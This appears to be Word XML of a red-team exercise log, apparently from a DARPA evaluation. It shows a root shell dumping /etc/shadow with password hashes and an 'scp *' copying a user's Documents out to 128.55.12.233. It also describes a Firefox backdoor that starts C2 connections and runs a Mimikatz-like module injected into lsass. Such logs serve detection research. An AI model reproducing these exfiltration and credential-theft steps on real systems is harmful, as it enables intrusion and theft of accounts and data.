    <w:p w14:paraId="36441E3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vahi:x:106:113:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E48D32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ightdm:x:107:115:Light Display Manager:/var/lib/lightdm:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD8F9C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dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F2F7C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vahi-autoipd:x:109:118:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34182E7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colord:x:110:120:colord colour management daemon,,,:/var/lib/colord:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBC36D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kernoops:x:111:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3591CB1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pulse:x:112:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35295FD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rtkit:x:113:123:RealtimeKit,,,:/proc:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4F7CB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aned:x:114:124::/home/saned:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776FA99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hoopsie:x:115:125::/nonexistent:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C988B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peech-dispatcher:x:116:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8E37A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hplip:x:117:7:HPLIP system user,,,:/var/run/hplip:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F91E5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ta3:x:1001:1001:TA3 User,,,:/home/ta3:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050CC29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ta52:x:1002:1002:TA52 User,,,:/home/ta52:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559231C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dmin:x:1003:1003:Admin,,,:/home/admin:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648BD8E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user:x:1004:1004:User,,,:/home/user:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640E338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iswitcher:x:1005:1005:Internet Switcher Service,,,:/home/iswitcher:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDB685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ntp:x:118:126::/home/ntp:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3E57B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plunk:x:1006:1006:Splunk Server:/opt/splunkforwarder:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B9368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prometheus:x:119:127:Prometheus daemon,,,,:/var/lib/prometheus:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6E4B95" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B56923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5:07</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0333D77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root@ta52-ubuntu-1:/etc# cat shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DEC74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root:!:17428:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8ED13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daemon:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FD429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bin:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEF536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ys:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5F35A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lastRenderedPageBreak/>
        <w:t>sync:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459A8AC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games:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CAF43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man:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0906FE5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p:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C57A00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mail:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A2F94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news:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F41A5E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uucp:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3486870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proxy:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F6F7E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ww-data:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4891230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backup:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F9695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ist:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3549C42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irc:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F6FEC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gnats:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439A389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nobody:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7A008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ibuuid:!:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7973F92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yslog:*:17016:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712B89B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messagebus:*:17428:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4F253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andscape:*:17428:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D54ADC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shd:*:17428:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249BF84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darpa:$6$qZLh4C1o$Ved7cSF4LvGN0Eow/4vC7KmpW6DCshZGzTc/rt5Ok2c7U3zHEwe2kCB.72He43cIyBCXMtqo/NDF26oDN0D.S1:17428:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E91544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usbmux:*:17479:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7859F08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vahi:*:17479:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6CECE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ightdm:*:17479:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C9BBA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dnsmasq:*:17479:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4431C08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vahi-autoipd:*:17479:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B4BFD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colord:*:17479:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08311E3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kernoops:*:17479:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F60B57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pulse:*:17479:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1D6FE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rtkit:*:17479:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305A4E6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aned:*:17479:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137D9CD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hoopsie:*:17479:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F656B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peech-dispatcher:!:17479:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0968B0C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hplip:*:17479:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10535C8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ta3:$6$dKwZiNDq7c$ZT/5r3gWSiX1ravToSgvOwZD3Th0FxhAnCB4wd7KOirVP/ucFKlsmG4Vh70ThRvXIO2mZEmF3Etf9IX.pXF7j/:17819:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691249E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ta52:$6$/R0.5o4EB1$E74dZ0Ihgx6Uo3YNWnbOOhVfvKmb6npZf9QJpgj0D9cb3SSm3ulmDJpGbMwNt3z9PIMM.MrLekZdwchioMkOR0:17819:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAA74C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dmin:$6$xvFHybfOzUlccoHY$r1iiRXW9m7TE/RrL4GYXECWiEb1vY7hjlyOo1ib8K11ZWtbDxOswfw3YngpdkzCO4ZLSze/mvhQdvUQgRKaK7.:17819:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4F60F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user:$6$PyzIwQMUm45$zp5Ywn5B27Jr3ADu6TAbozDRKnSmc6LxCrs8WevCkklm2GwFZIQzO2PHRRlOUzovd1e/Yaq8yHQrQ1gWpnapI1:17819:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7347E00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iswitcher:$6$LnLdWwNr8VwH1$RhkU2yaVSAGE015CMXOamYKklXm94oLGQIishhkgQ58KD8R5sR6/HX2PZqN1tQWoQGXEjVR0KVnwR7sPtluM5/:17819:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276AA03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ntp:*:17819:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4091745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plunk:!:17827:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2729DC7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prometheus:*:18009:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFBA26A" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F92868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5:09</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4340214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root@ta52-ubuntu-1:/etc# cd /home/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4A06D3" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48F4988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5:10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8D597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root@ta52-ubuntu-1:~# ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAF5C2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batised   arthrodynic      bacalaos  calligraph  colloblast    dianite    Downloads         files        glx_alsa_675.ko   hydathode      jna-95354950       mail      monosomatic   nondetrimental  out857         passwd    podiatric        pyretogenesis  stentoriously  tjenkal     wobblingly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216EA65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battises  arthrodynic~     backup    caoutchouc  counterquery  docs       eburnation        fizgigs      grains            inertion       launchmyserver.sh  marveled  Music         nunni           out864         pedicels  protometaphrast  responsions    synchronal     tylosis     work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF072E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holds     athrill          bargoose  carabinero  crooner       Documents  evacuation        gastrotomic  hosts             interlisp      linener            mchk      naughtiest    out20           out912         Pictures  prussify         returner       Templates      Videos      xvnc4viewer.deb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F76030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llocate   azygobranchiate  bebloods  chanst      Desktop       doggery    examples.desktop  generalty    hsperfdata_darpa  irremunerable  load_helper.ko     minion    nodeexporter  out249          overproneness  pigritia  Public           schizocoele    test           whimpering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D600DD3" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38FF140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5:10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB0D34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root@ta52-ubuntu-1:~# cd Documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A5DFC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root@ta52-ubuntu-1:~/Documents# ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7486835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biol  dabbers  democraw  endemical  genetous  halitosis  liasing  paintership  palatoplegia  pityocampe  planisphere  pseudostomatous  pteridophilist  punished  rippier  scribblative  scrupula  sha  squinant  tardant  tint  unextraneously  utinam  whipcraft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676AC88C" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="069C989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5:11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4096009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root@ta52-ubuntu-1:~/Documents# scp * admin@128.55.12.233:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A17BB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The authenticity of host '128.55.12.233 (128.55.12.233)' can't be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F150E8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ECDSA key fingerprint is 4d:ef:3d:19:9d:1b:54:e8:bc:6f:5a:aa:cb:16:8e:dd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DB171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re you sure you want to continue connecting (yes/no)? yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511213E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arning: Permanently added '128.55.12.233' (ECDSA) to the list of known hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D92DF2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admin@128.55.12.233's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4688EC7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biol                                           100% 1605     1.6KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE525C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dabbers                                        100% 1004     1.0KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE7A0E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democraw                                       100% 1675     1.6KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1315AF8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endemical                                      100% 1027     1.0KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FC1C3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genetous                                       100% 1026     1.0KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD471E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halitosis                                      100% 1124     1.1KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1423978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liasing                                        100%  540     0.5KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34789E1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paintership                                    100% 1100     1.1KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1254900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palatoplegia                                   100% 1775     1.7KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51250EB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pityocampe                                     100% 1024     1.0KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B25D9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planisphere                                    100%  324     0.3KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BD654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pseudostomatous                                100%  736     0.7KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE29B6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pteridophilist                                 100% 1510     1.5KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42706CC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punished                                       100% 1903     1.9KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0AB8A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rippier                                        100% 1355     1.3KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5AEA1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scribblative                                   100% 1909     1.9KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D40F5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scrupula                                       100% 1563     1.5KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005E187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sha                                            100% 1790     1.8KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DC364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squinant                                       100%  680     0.7KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1A7D4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tardant                                        100% 1591     1.6KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3646272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tint                                           100% 1659     1.6KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C59BD5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unextraneously                                 100% 1865     1.8KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C1A43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utinam                                         100% 1114     1.1KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C4FA1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whipcraft                                      100% 1273     1.2KB/s   00:00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BB1BB9" w14:textId="2E0030CD" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_jklul5h8ktju" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="32" w:name="_Toc12600008"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>15:14 -- TA5.2 Windows 1 -- Firefox Drakon APT Elevate Copykatz 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="7C235A40" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Reran the Drakon test for the third time, this time with the elevate driver and copykatz module.  Exploited Firefox backdoor by browsing to compromised host http://128.55.12.233.  loaderDrakon was executed in Firefox memory and connected out to 128.55.12.233:8000 and 128.55.12.233:443 for C2.  Loaded the copykatz module into Firefox memory.  Copykatz injected into the lsass.exe process to harvest credentials from logged on users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7060B08F" w14:textId="3361A56D" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc12600009"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="486263C5" w14:textId="095C9E0E" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00BA5AEF" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta51-pivot-2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00FC027E" w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>128.55.12.233</w:t>
      </w:r>
      <w:r w:rsidR="00FC027E" w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00FC027E" w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00FC027E" w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>Ubuntu 14.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019A664B" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta52-windows-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.76</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Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B530A0A" w14:textId="13968E49" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_ajnbpmhk3c3h" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="35" w:name="_Toc12600010"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="5BB4DD5A" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Firefox 54.0.1 backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449CA21F" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Drakon APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480447F1" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Elevate driver (Perfmon)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6748C9BB" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Copykatz module (Mimikatz)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6FFB53" w14:textId="21E2C6E0" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_uvgarzr1xnb5" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="37" w:name="_Toc12600011"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="59098AA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5:14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E19DB7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Benign activity opened Firefox and browsed to http://128.55.12.233</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2106905F" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13DD624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 New connection received ##################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F11235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windows] [x64] [N/A] [N/A]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F86057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Initializing new windows console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138BA06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lastRenderedPageBreak/>
        <w:t>[*] ################## NEW CONSOLE READY [W1] ####################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E95A63F" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E17B16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5:14</w:t>
      </w:r>
    </w:p>
